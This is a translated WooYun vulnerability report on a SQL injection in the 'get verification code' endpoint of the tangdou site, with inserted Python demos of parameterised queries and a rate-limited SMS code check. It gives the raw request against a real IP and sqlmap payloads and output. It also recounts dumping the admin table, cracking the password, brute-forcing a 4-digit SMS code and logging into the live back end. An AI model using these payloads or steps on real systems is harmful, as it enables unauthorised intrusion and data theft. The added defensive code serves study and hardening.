2016-04-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2016-05-22: The vendor has actively ignored the vulnerability; details are disclosed to the public.
If a million users still can't make the front page, then I'd be truly disappointed in WooYun
http://123.59.58.72/ is the same site as http://txd.tangdou.com
The "get verification code" click is injectable.
POST request:
POST /?action=chk_mobile HTTP/1.1
Host: 123.59.58.72
Content-Length: 17
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://123.59.58.72
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBrowser/5.6.11466.201 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://123.59.58.72/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=eaecm668tnrd64ai5ibl5fk2o0
Connection: close

phone=13800138000*
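The following is an added example, not code from the original report or from the tangdou site: a minimal model of a `chk_mobile`-style handler, first in the vulnerable shape (request parameter pasted into the SQL text) and then in a hardened shape (input validated, value bound as a parameter). The table, column names and sample rows are constructed for the demo; the real backend was MySQL, so the probes below adapt the page's boolean-based payload to a quoted-string context and SQLite's `--` comment marker. `oracle_visible` is a regression check a defender can keep: it reports whether two probes with opposite truth values produce different answers, which is exactly the signal a boolean-based blind injection relies on.

```python
import re
import sqlite3


def make_db():
    """Constructed sample table; the real 'tangdouapp' database is known only by name."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, phone TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (phone) VALUES (?)",
                     [("13800138000",), ("13900139000",)])
    return conn


def chk_mobile_vulnerable(conn, phone):
    """Vulnerable shape: the request parameter is concatenated into the SQL text,
    so whoever controls 'phone' controls the WHERE clause."""
    sql = "SELECT COUNT(*) FROM users WHERE phone = '" + phone + "'"
    return conn.execute(sql).fetchone()[0]


# Boolean-based blind probes in the style of the sqlmap payload on this page,
# adapted to a quoted-string context and to SQLite's '--' comment marker.
PROBE_TRUE = "x' OR NOT 3632=3633 --"   # injected condition evaluates true
PROBE_FALSE = "x' OR NOT 3632=3632 --"  # injected condition evaluates false

# Assumed format for this demo: exactly 11 digits. Adjust to the real numbering plan.
PHONE_RE = re.compile(r"\d{11}")


def chk_mobile_hardened(conn, phone):
    """Hardened shape: reject anything that is not a phone number, then bind the
    value as a query parameter so it can never change the SQL structure."""
    if not PHONE_RE.fullmatch(phone):
        raise ValueError("phone must be exactly 11 digits")
    row = conn.execute("SELECT COUNT(*) FROM users WHERE phone = ?", (phone,)).fetchone()
    return row[0]


def oracle_visible(handler, conn):
    """True when opposite-truth probes get different answers: the handler leaks a
    boolean oracle. A hardened handler rejects both probes, so no oracle exists."""
    try:
        return handler(conn, PROBE_TRUE) != handler(conn, PROBE_FALSE)
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks oracle:", oracle_visible(chk_mobile_vulnerable, db))
    print("hardened handler leaks oracle:  ", oracle_visible(chk_mobile_hardened, db))
```

With the vulnerable handler the true probe matches every row and the false probe matches none, which is the count difference sqlmap's boolean-based blind technique reads one bit at a time; the hardened handler answers both probes with a validation error and the difference disappears.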
You thought that was all? NO. Saw the admin table, so dumped it.
After decrypting the admin password, logged into the back end (the back end has an SMS verification code; guessed it might be 4 digits, so brute-forced the code, and it really was 4 digits). After logging in, this is the admin list:
This is the user list, proving there really are a million users and it is not made up:
Bonus
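The following is an added example, not code from the original report or from the tangdou back end: a small SMS one-time-code verifier that shows why a 4-digit code with no attempt limit, as described above, is guessable within 10,000 tries, and how an expiring code with a per-session attempt cap closes that gap. Code length, the attempt cap, the validity window and the session ids are assumptions chosen for the demo; the random source and clock are injectable so the behaviour can be tested deterministically.

```python
import hmac
import secrets
import time


class OtpStore:
    """Issues and checks numeric one-time codes keyed by session id (demo design)."""

    def __init__(self, digits=6, max_attempts=5, ttl_seconds=300,
                 rng=secrets.randbelow, clock=time.time):
        self.digits = digits
        self.max_attempts = max_attempts
        self.ttl = ttl_seconds
        self.rng = rng        # injectable for tests; secrets.randbelow in production
        self.clock = clock    # injectable for tests; time.time in production
        self._codes = {}      # session_id -> [code, expires_at, attempts]

    def issue(self, session_id):
        """Generate a fresh code. The caller would send it by SMS; it is returned
        here only so the sending side has it."""
        code = f"{self.rng(10 ** self.digits):0{self.digits}d}"
        self._codes[session_id] = [code, self.clock() + self.ttl, 0]
        return code

    def verify(self, session_id, candidate):
        """Returns 'ok', 'wrong', 'locked', 'expired' or 'unknown'. Every outcome
        except 'wrong' invalidates the code, so a code can be used at most once."""
        rec = self._codes.get(session_id)
        if rec is None:
            return "unknown"
        code, expires_at, _ = rec
        if self.clock() > expires_at:
            del self._codes[session_id]
            return "expired"
        rec[2] += 1
        if hmac.compare_digest(code, candidate):   # constant-time comparison
            del self._codes[session_id]
            return "ok"
        if rec[2] >= self.max_attempts:
            del self._codes[session_id]            # cap reached: force a new code
            return "locked"
        return "wrong"


def simulate_guessing(store, session_id):
    """Defensive check: try every code in order and report (final status, calls made).
    A correctly limited store must report 'locked' long before the space is covered."""
    calls = 0
    for i in range(10 ** store.digits):
        calls += 1
        status = store.verify(session_id, f"{i:0{store.digits}d}")
        if status != "wrong":
            return status, calls
    return "exhausted", calls


if __name__ == "__main__":
    # 4 digits, effectively unlimited attempts: the shape the report describes.
    weak = OtpStore(digits=4, max_attempts=10 ** 6)
    weak.issue("login-session-A")   # constructed session id
    print("weak store:", simulate_guessing(weak, "login-session-A"))

    # 6 digits, 5 attempts, 5-minute validity.
    strong = OtpStore(digits=6, max_attempts=5, ttl_seconds=300)
    strong.issue("login-session-B")
    print("strong store:", simulate_guessing(strong, "login-session-B"))
```

The attempt cap is what matters most: with 5 guesses against a 6-digit code the success probability per issued code is 5 in 1,000,000, and the expiry window bounds how long a stolen or intercepted code remains usable. Lockout should be per session or per phone number rather than per source IP alone, since the report's request already shows the check is driven by a client-supplied session cookie.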
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 397 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: phone=13800138000 OR NOT 3632=3632#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: phone=13800138000 AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(5987=5987,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: phone=13800138000 AND (SELECT * FROM (SELECT(SLEEP(5)))wJyo)
---
[12:46:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0
[12:46:33] [INFO] fetching database names
[12:46:34] [INFO] the SQL query used returns 5 entries
[12:46:34] [INFO] starting 5 threads
[12:46:34] [INFO] retrieved: performance_schema
[12:46:34] [INFO] retrieved: information_schema
[12:46:34] [INFO] retrieved: mysql
[12:46:34] [INFO] retrieved: tangdouapp
[12:46:34] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] tangdouapp
[*] test
[12:46:34] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\123.59.58.72'
Unable to contact the vendor, or the vendor actively refused.
Vulnerability rank: 15 (WooYun rating)